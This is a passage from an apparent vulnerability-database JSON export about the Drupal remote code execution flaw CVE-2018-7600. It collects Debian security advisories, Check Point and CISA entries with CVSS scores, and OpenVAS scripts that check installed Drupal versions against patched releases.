Mattsson found a remote code 
execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\n\nFor further information please refer to the official upstream advisory\nat <https://www.drupal.org/sa-core-2018-002>.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n7.14-2+deb7u18.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-28T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-07-21T05:52:04", "id": "OSV:DLA-1325-1", "href": "https://osv.dev/vulnerability/DLA-1325-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:24:04", "description": "\nA remote 
code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\n<https://www.drupal.org/sa-core-2018-002>\n\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/drupal7>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-07-21T05:49:48", "id": "OSV:DSA-4156-1", "href": "https://osv.dev/vulnerability/DSA-4156-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:24:55", "description": "A code execution 
vulnerability exists in Drupal Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "checkpoint_advisories", "title": "Drupal Core Remote Code Execution (CVE-2018-7600)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-02-20T00:00:00", "id": "CPAI-2018-0192", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:12:02", "description": "A code execution vulnerability exists in Drupal Core. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-11-05T00:00:00", "type": "checkpoint_advisories", "title": "Drupal Core Form Rendering Remote Code Execution (CVE-2018-7600)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2020-11-05T00:00:00", "id": "CPAI-2018-1697", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T21:32:44", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4156-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7600\nDebian Bug : 894259\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. 
For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T22:31:37", "type": "debian", "title": "[SECURITY] [DSA 4156-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-28T22:31:37", "id": "DEBIAN:DSA-4156-1:CE193", "href": "https://lists.debian.org/debian-security-announce/2018/msg00082.html", 
"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T04:32:22", "description": "Package : drupal7\nVersion : 7.14-2+deb7u18\nCVE ID : CVE-2018-7600\n\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T22:42:25", "type": "debian", "title": "[SECURITY] [DLA 1325-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": 
"2018-03-28T22:42:25", "id": "DEBIAN:DLA-1325-1:E895C", "href": "https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T12:59:37", "description": "Package : drupal7\nVersion : 7.14-2+deb7u18\nCVE ID : CVE-2018-7600\n\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T22:42:25", "type": "debian", "title": "[SECURITY] [DLA 1325-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-28T22:42:25", "id": "DEBIAN:DLA-1325-1:426F0", "href": "https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-18T23:49:45", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4156-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7600\nDebian Bug : 894259\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T22:31:37", "type": "debian", "title": "[SECURITY] [DSA 4156-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-28T22:31:37", "id": "DEBIAN:DSA-4156-1:C1814", "href": "https://lists.debian.org/debian-security-announce/2018/msg00082.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Drupal module configuration vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-7600", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:34", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310812583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812583", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812583\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 09:55:26 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. 
This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = 
get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\"){\n fix = \"8.5.1\";\n}\n\nif(drupalVer =~ \"^(8\\.)\" && version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"8.3.9\";\n}\n\nif(drupalVer =~ \"^(8\\.)\" && version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"8.4.6\";\n}\n\nif(drupalVer =~ \"^(7\\.)\" && version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310812584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 
2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812584\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 10:53:12 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. 
This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = 
get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9.]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\") {\n fix = \"Upgrade to 8.5.1\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"Upgrade to 8.3.9\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"Upgrade to 8.4.6\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"Upgrade to 7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:06:51", "description": "Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. 
This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for drupal7 (DLA-1325-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891325", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
